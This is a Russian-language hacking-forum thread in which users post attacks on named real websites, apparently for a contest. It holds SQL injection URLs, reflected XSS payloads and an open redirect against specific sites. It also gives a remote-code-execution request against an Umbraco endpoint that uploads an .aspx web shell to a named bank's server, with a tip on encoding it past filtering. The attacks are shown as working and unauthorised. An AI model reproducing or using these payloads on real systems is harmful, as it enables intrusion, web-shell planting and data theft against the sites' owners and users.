ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.11.2015, 12:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
5275
Репутация:
6
|
|
SQLi
http://www.ataegitim.com.tr/yurtdisi_egitim.php?id=1+union+select+1,2,3,versio n(),5,6,7
http://www.bursaymmo.org.tr/fotografgalerisi/haber_oku.php?haber_id=14+union+select+version(),2 ,3,4,5,6
http://www.sistemkalip.com.tr/tr/haber_detay.php?recordID=1+union+select+1,2,versio n(),4,5,6 |
|
|
|
28.11.2015, 17:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
32618
Репутация:
1
|
|
Сайт: http://www.academyplazahotel.ie/
Уязвимость: Reflected XSS
Код:
Code:
http://www.academyplazahotel.ie/booknow.php?bg=FFFFFF&color='"-->alert(1234567890)
Сайт: http://www.cleanrooms-ireland.ie
Уязвимость: Reflected XSS
Код:
Code:
http://www.cleanrooms-ireland.ie/w/link.cfm?w_y=4&w_u='"-->alert(1234567890)
там же: (?redirect?)
Код:
Code:
http://www.cleanrooms-ireland.ie/w/llink.cfm?w_y=4&w_u=http://google.com
Сайт: http://forums.somethingawful.com
Уязвимость: Reflected XSS
Код:
Code:
http://forums.somethingawful.com/account.php?action=loginform&next=/member.php"()%26%25alert(1234567890)
Сайт: http://www.zoommoola.com
Уязвимость: Reflected XSS
Код:
Code:
http://www.zoommoola.com/?ref='"-->alert(1234567890)
Сайт: http://www.usatestprep.com
Уязвимость: Reflected XSS
Код:
Code:
http://www.usatestprep.com/modules/map/_brains/map_product.php?id=&page=landing'"()&%alert(123456)
Сайт: http://txbra.org
Уязвимость: XSS
Код:
Code:
HTMLFormElement.prototype.submit.call(document.forms[0]);
|
|
|
|
02.12.2015, 15:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
5275
Репутация:
6
|
|
Конкурс уже не актуален?
http://www.tontomarine.co.uk/boat.p...4,5,version(),7,8,9,0,11,12,13,14,15,16,1 7,18 |
|
|
|
21.12.2015, 14:15
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
актуален, времени пока нет разгрести. позже всем добавлю
|
|
|
31.12.2015, 20:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
97114
Репутация:
24
|
|
Remote Code Execution
Сайт: ecb.md
Эксплоит:
Код:
Code:
POST /umbraco/webservices/codeEditorSave.asmx HTTP/1.1
SOAPAction: "http://tempuri.org/SaveDLRScript"
Content-Type: text/xml
Host: ecb.md
Content-Length: 710
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/..\\..\\..\\umbraco\\shell.aspx
string
Код шелла .aspx,в burpsuite выбираем
Convert selection->Html->Html encode key characters
так прошел через фильтрацию
1
Заливается тут ecb.md/umbraco/shell.aspx |
|
|
|
01.01.2016, 01:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
10237
Репутация:
0
|
|
зашел на ecb.md, стало страшно, ушел)
|
|
|
|
01.01.2016, 01:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
97114
Репутация:
24
|
|
Сообщение от chatanti
chatanti said:
↑
зашел на ecb.md, стало страшно, ушел) Месныи банк )
|
|
|
|
04.01.2016, 16:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от AAI
AAI said:
↑
Сайт:
http://www.cobranet.org/
Уязвимость: SQL injection
Код:
Code:
http://www.cobranet.org/about.php?id=1+union+select+1,2,3,4,5,6
к сожалению дальше не раскрутил. Вы уже всё сделали
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.cobranet.org/about.php?id=1+union+select+1,database(),3,user(),5,6+--+-[/COLOR][/COLOR]
|
|
|
|
04.01.2016, 19:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
3616
Репутация:
1
|
|
|
|
|
|
06.01.2016, 12:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
31545
Репутация:
6
|
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
